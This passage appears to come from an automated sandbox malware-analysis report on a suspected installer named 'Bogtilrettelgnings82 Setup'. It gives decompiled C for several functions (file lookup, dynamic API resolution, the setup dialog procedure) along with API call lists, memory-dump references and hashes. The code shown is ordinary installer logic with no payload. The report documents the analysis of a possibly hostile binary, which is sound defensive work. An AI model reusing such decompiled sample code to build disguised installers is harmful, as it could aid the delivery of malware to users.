                                                                      0x004068e7
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x004068e7
                                                                      0x00406b1c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                                      • Instruction ID: 6e58a974b7539627981ffc7c5b29088a4c4f0515112d774f0dd61bb038518bac
                                                                      • Opcode Fuzzy Hash: ec72fc132c466b913675dee2fa2b2b567fe445eb5db00bf473192c6c9f577d16
                                                                      • Instruction Fuzzy Hash: 8DF17770D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D7785A96CF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405FE2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405FE2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x421530); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x421530;
			}




                                                                      0x00405fed
                                                                      0x00405ff6
                                                                      0x00000000
                                                                      0x00406003
                                                                      0x00405ff9
                                                                      0x00000000

                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(?,00421530,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,0040589F,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,?,746AF560,004055BE,?,C:\Users\user\AppData\Local\Temp\,746AF560), ref: 00405FED
                                                                      • FindClose.KERNEL32(00000000), ref: 00405FF9
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp, xrefs: 00405FE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp
                                                                      • API String ID: 2295610775-3416995437
                                                                      • Opcode ID: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                                      • Instruction ID: 3600370175755c1184b2d23a4f6bb82519631065e8d036e0b8342efe42824015
                                                                      • Opcode Fuzzy Hash: 20260570c2d7e465130872416de93bc7e309ed693e48b052a27977fc02f21dff
                                                                      • Instruction Fuzzy Hash: EBD0123295D1306BD3115778BD0C84BBA589F55334B528A73B466F22F0D7349C6286EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406009 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00406009(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409250);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409254));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                      0x00406011
                                                                      0x00406014
                                                                      0x0040601b
                                                                      0x00406023
                                                                      0x00406030
                                                                      0x00000000
                                                                      0x00406037
                                                                      0x00406026
                                                                      0x0040602e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040603f

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                                      • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                      • String ID:
                                                                      • API String ID: 310444273-0
                                                                      • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                                      • Instruction ID: 3e3a2605e63591ce59f726a843aae7ace037ed194313f5fe4a7956cb36b79068
                                                                      • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                                                      • Instruction Fuzzy Hash: 4AE0CD3290412167C3109B749D44E3773ACAFD4751305483DF506F2150D734AC11E7AD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403AF9 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 164 403af9-403b0b 165 403b11-403b17 164->165 166 403c4c-403c5b 164->166 165->166 167 403b1d-403b26 165->167 168 403caa-403cbf 166->168 169 403c5d-403c98 GetDlgItem * 2 call 403fcc KiUserCallbackDispatcher call 40140b 166->169 172 403b28-403b35 SetWindowPos 167->172 173 403b3b-403b3e 167->173 170 403cc1-403cc4 168->170 171 403cff-403d04 call 404018 168->171 188 403c9d-403ca5 169->188 176 403cc6-403cd1 call 401389 170->176 177 403cf7-403cf9 170->177 186 403d09-403d24 171->186 172->173 179 403b40-403b52 ShowWindow 173->179 180 403b58-403b5e 173->180 176->177 199 403cd3-403cf2 SendMessageA 176->199 177->171 185 403f99 177->185 179->180 182 403b60-403b75 DestroyWindow 180->182 183 403b7a-403b7d 180->183 189 403f76-403f7c 182->189 190 403b90-403b96 183->190 191 403b7f-403b8b SetWindowLongA 183->191 187 403f9b-403fa2 185->187 193 403d26-403d28 call 40140b 186->193 194 403d2d-403d33 186->194 188->168 189->185 200 403f7e-403f84 189->200 197 403c39-403c47 call 404033 190->197 198 403b9c-403bad GetDlgItem 190->198 191->187 193->194 195 403f57-403f70 DestroyWindow EndDialog 194->195 196 403d39-403d44 194->196 195->189 196->195 202 403d4a-403d97 call 405d00 call 403fcc * 3 GetDlgItem 196->202 197->187 203 403bcc-403bcf 198->203 204 403baf-403bc6 SendMessageA IsWindowEnabled 198->204 199->187 200->185 206 403f86-403f8f ShowWindow 200->206 234 403da1-403ddd ShowWindow KiUserCallbackDispatcher call 403fee EnableWindow 202->234 235 403d99-403d9e 202->235 208 403bd1-403bd2 203->208 209 403bd4-403bd7 203->209 204->185 204->203 206->185 212 403c02-403c07 call 403fa5 208->212 213 403be5-403bea 209->213 214 403bd9-403bdf 209->214 212->197 217 403c20-403c33 SendMessageA 213->217 219 403bec-403bf2 213->219 214->217 218 403be1-403be3 214->218 217->197 218->212 222 403bf4-403bfa call 40140b 219->222 223 403c09-403c12 call 40140b 219->223 230 403c00 222->230 223->197 232 403c14-403c1e 223->232 230->212 232->230 238 403de2 234->238 239 403ddf-403de0 234->239 235->234 240 403de4-403e12 GetSystemMenu EnableMenuItem SendMessageA 238->240 239->240 241 403e14-403e25 SendMessageA 240->241 242 403e27 240->242 243 403e2d-403e66 call 404001 call 405cde lstrlenA call 405d00 SetWindowTextA call 401389 241->243 242->243 243->186 252 403e6c-403e6e 243->252 252->186 253 403e74-403e78 252->253 254 403e97-403eab DestroyWindow 253->254 255 403e7a-403e80 253->255 254->189 256 403eb1-403ede CreateDialogParamA 254->256 255->185 257 403e86-403e8c 255->257 256->189 259 403ee4-403f3b call 403fcc GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 256->259 257->186 258 403e92 257->258 258->185 259->185 264 403f3d-403f50 ShowWindow call 404018 259->264 266 403f55 264->266 266->189
                                                                      C-Code - Quality: 84%
                                                                      			E00403AF9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x41fcc8 = _t35;
					if(_t115 == 0x110) {
						 *0x4236e8 = _t125;
						 *0x41fcdc = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41eca8 = _t91;
						E00403FCC(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x422ec8); // executed
						 *0x422eac = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x41fcc8 = 1;
					}
					_t122 =  *0x4091f0; // 0x0
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423700;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00404018(0x40b);
						while(1) {
							_t37 =  *0x41fcc8; // 0x1
							 *0x4091f0 =  *0x4091f0 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091f0; // 0x0
							__eflags = _t39 -  *0x423704;
							if(_t39 ==  *0x423704) {
								E0040140B(1);
							}
							__eflags =  *0x422eac - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x4091f0 -  *0x423704; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D00(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403FCC(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403FCC(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403FCC(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42376c - _t133;
							_v32 = _t49;
							if( *0x42376c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403FEE(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41eca8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42376c - _t133;
							if( *0x42376c == _t133) {
								_push( *0x41fcdc);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41eca8);
							}
							E00404001();
							E00405CDE(0x41fce0, "Bogtilrettelgnings82 Setup");
							E00405D00(0x41fce0, _t125, _t130,  &(0x41fce0[lstrlenA(0x41fce0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x41fce0); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x422eb8); // executed
									 *0x41f4b8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x4236e0,  *_t130 +  *0x422ec0 & 0x0000ffff, _t125,  *(0x4091f4 +  *(_t130 + 4) * 4), _t130); // executed
									__eflags = _t73 - _t133;
									 *0x422eb8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403FCC(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x422eb8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x422eac - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x422eb8, 8); // executed
									E00404018(0x405);
									goto L58;
								}
								__eflags =  *0x42376c - _t133;
								if( *0x42376c != _t133) {
									goto L61;
								}
								__eflags =  *0x423760 - _t133;
								if( *0x423760 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x422eb8);
						 *0x4236e8 = _t133;
						EndDialog(_t125,  *0x41f0b0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x422eb8, 0x40f, 0, 1);
						__eflags =  *0x422eac - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x41fcc0, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x41fcc0,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00404033(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x422eb8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42376c - _t133;
										if( *0x42376c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f0b0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FA5();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f0b0 = _t127;
										goto L21;
									}
									__eflags =  *0x4091f0 - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x422eb8);
						 *0x422eb8 = _a12;
						L58:
						if( *0x420ce0 == _t133) {
							_t142 =  *0x422eb8 - _t133; // 0x10476
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa); // executed
								 *0x420ce0 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                      0x00403b02
                                                                      0x00403b0b
                                                                      0x00403c4c
                                                                      0x00403c50
                                                                      0x00403c54
                                                                      0x00403c56
                                                                      0x00403c5b
                                                                      0x00403c66
                                                                      0x00403c71
                                                                      0x00403c76
                                                                      0x00403c78
                                                                      0x00403c7a
                                                                      0x00403c7d
                                                                      0x00403c82
                                                                      0x00403c90
                                                                      0x00403c9d
                                                                      0x00403ca4
                                                                      0x00403ca4
                                                                      0x00403ca5
                                                                      0x00403ca5
                                                                      0x00403caa
                                                                      0x00403cb0
                                                                      0x00403cb7
                                                                      0x00403cbd
                                                                      0x00403cbf
                                                                      0x00403cff
                                                                      0x00403d04
                                                                      0x00403d09
                                                                      0x00403d09
                                                                      0x00403d0e
                                                                      0x00403d17
                                                                      0x00403d19
                                                                      0x00403d1e
                                                                      0x00403d24
                                                                      0x00403d28
                                                                      0x00403d28
                                                                      0x00403d2d
                                                                      0x00403d33
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403d3e
                                                                      0x00403d44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403d4d
                                                                      0x00403d55
                                                                      0x00403d5a
                                                                      0x00403d5d
                                                                      0x00403d63
                                                                      0x00403d68
                                                                      0x00403d6b
                                                                      0x00403d71
                                                                      0x00403d76
                                                                      0x00403d79
                                                                      0x00403d7f
                                                                      0x00403d87
                                                                      0x00403d8d
                                                                      0x00403d93
                                                                      0x00403d97
                                                                      0x00403d9e
                                                                      0x00403d9e
                                                                      0x00403d9e
                                                                      0x00403da8
                                                                      0x00403dba
                                                                      0x00403dc6
                                                                      0x00403dcb
                                                                      0x00403dd5
                                                                      0x00403ddb
                                                                      0x00403ddd
                                                                      0x00403de2
                                                                      0x00403ddf
                                                                      0x00403ddf
                                                                      0x00403ddf
                                                                      0x00403df2
                                                                      0x00403e0a
                                                                      0x00403e0c
                                                                      0x00403e12
                                                                      0x00403e27
                                                                      0x00403e14
                                                                      0x00403e1d
                                                                      0x00403e1f
                                                                      0x00403e1f
                                                                      0x00403e2d
                                                                      0x00403e3d
                                                                      0x00403e4e
                                                                      0x00403e55
                                                                      0x00403e5b
                                                                      0x00403e5f
                                                                      0x00403e64
                                                                      0x00403e66
                                                                      0x00000000
                                                                      0x00403e6c
                                                                      0x00403e6c
                                                                      0x00403e6e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403e74
                                                                      0x00403e78
                                                                      0x00403e9d
                                                                      0x00403ea3
                                                                      0x00403ea9
                                                                      0x00403eab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403ed1
                                                                      0x00403ed7
                                                                      0x00403ed9
                                                                      0x00403ede
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403ee4
                                                                      0x00403ee7
                                                                      0x00403eea
                                                                      0x00403f01
                                                                      0x00403f0d
                                                                      0x00403f26
                                                                      0x00403f2c
                                                                      0x00403f30
                                                                      0x00403f35
                                                                      0x00403f3b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403f45
                                                                      0x00403f50
                                                                      0x00000000
                                                                      0x00403f50
                                                                      0x00403e7a
                                                                      0x00403e80
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403e86
                                                                      0x00403e8c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403e92
                                                                      0x00403e66
                                                                      0x00403f5d
                                                                      0x00403f69
                                                                      0x00403f70
                                                                      0x00000000
                                                                      0x00403cc1
                                                                      0x00403cc1
                                                                      0x00403cc4
                                                                      0x00403cf7
                                                                      0x00403cf7
                                                                      0x00403cf9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403cf9
                                                                      0x00403cc6
                                                                      0x00403cca
                                                                      0x00403ccf
                                                                      0x00403cd1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403ce1
                                                                      0x00403ce9
                                                                      0x00000000
                                                                      0x00403cef
                                                                      0x00403b1d
                                                                      0x00403b1d
                                                                      0x00403b21
                                                                      0x00403b26
                                                                      0x00403b35
                                                                      0x00403b35
                                                                      0x00403b3e
                                                                      0x00403b47
                                                                      0x00403b52
                                                                      0x00403b52
                                                                      0x00403b5e
                                                                      0x00403b7a
                                                                      0x00403b7d
                                                                      0x00403b90
                                                                      0x00403b96
                                                                      0x00403c39
                                                                      0x00000000
                                                                      0x00403c42
                                                                      0x00403b9c
                                                                      0x00403ba9
                                                                      0x00403bab
                                                                      0x00403bad
                                                                      0x00403bcc
                                                                      0x00403bcc
                                                                      0x00403bcf
                                                                      0x00403bd4
                                                                      0x00403bd7
                                                                      0x00403be7
                                                                      0x00403be8
                                                                      0x00403bea
                                                                      0x00403c20
                                                                      0x00403c33
                                                                      0x00000000
                                                                      0x00403c33
                                                                      0x00403bec
                                                                      0x00403bf2
                                                                      0x00403c0b
                                                                      0x00403c10
                                                                      0x00403c12
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403c14
                                                                      0x00403c00
                                                                      0x00403c00
                                                                      0x00403c02
                                                                      0x00403c02
                                                                      0x00000000
                                                                      0x00403c02
                                                                      0x00403bf5
                                                                      0x00403bfa
                                                                      0x00000000
                                                                      0x00403bfa
                                                                      0x00403bd9
                                                                      0x00403bdf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403be1
                                                                      0x00000000
                                                                      0x00403be1
                                                                      0x00403bd1
                                                                      0x00000000
                                                                      0x00403bd1
                                                                      0x00403bb7
                                                                      0x00403bbe
                                                                      0x00403bc4
                                                                      0x00403bc6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403bc6
                                                                      0x00403b82
                                                                      0x00000000
                                                                      0x00403b60
                                                                      0x00403b66
                                                                      0x00403b70
                                                                      0x00403f76
                                                                      0x00403f7c
                                                                      0x00403f7e
                                                                      0x00403f84
                                                                      0x00403f89
                                                                      0x00403f8f
                                                                      0x00403f8f
                                                                      0x00403f84
                                                                      0x00403f99
                                                                      0x00000000
                                                                      0x00403f99
                                                                      0x00403b5e

                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B35
                                                                      • ShowWindow.USER32(?), ref: 00403B52
                                                                      • DestroyWindow.USER32 ref: 00403B66
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B82
                                                                      • GetDlgItem.USER32 ref: 00403BA3
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BB7
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403BBE
                                                                      • GetDlgItem.USER32 ref: 00403C6C
                                                                      • GetDlgItem.USER32 ref: 00403C76
                                                                      • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403C90
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CE1
                                                                      • GetDlgItem.USER32 ref: 00403D87
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403DA8
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DBA
                                                                      • EnableWindow.USER32(?,?), ref: 00403DD5
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DEB
                                                                      • EnableMenuItem.USER32 ref: 00403DF2
                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E0A
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E1D
                                                                      • lstrlenA.KERNEL32(Bogtilrettelgnings82 Setup: Installing,?,Bogtilrettelgnings82 Setup: Installing,Bogtilrettelgnings82 Setup), ref: 00403E46
                                                                      • SetWindowTextA.USER32(?,Bogtilrettelgnings82 Setup: Installing), ref: 00403E55
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403F89
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                      • String ID: Bogtilrettelgnings82 Setup$Bogtilrettelgnings82 Setup: Installing
                                                                      • API String ID: 3906175533-1893935501
                                                                      • Opcode ID: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                                      • Instruction ID: d55a176a90e8b499f18b63baceb11f369ce23e9a5aae2cf9a731fb05d42b674d
                                                                      • Opcode Fuzzy Hash: 3af7463b2e0411250df35f95db1130c0cb8f9a1cf295a811f0ddb8dbc054c1be
                                                                      • Instruction Fuzzy Hash: 20C1C271A04205BBDB206F61ED49E2B3E7CFB4470AF41443EF601B12E1C779A942AB5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403767 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
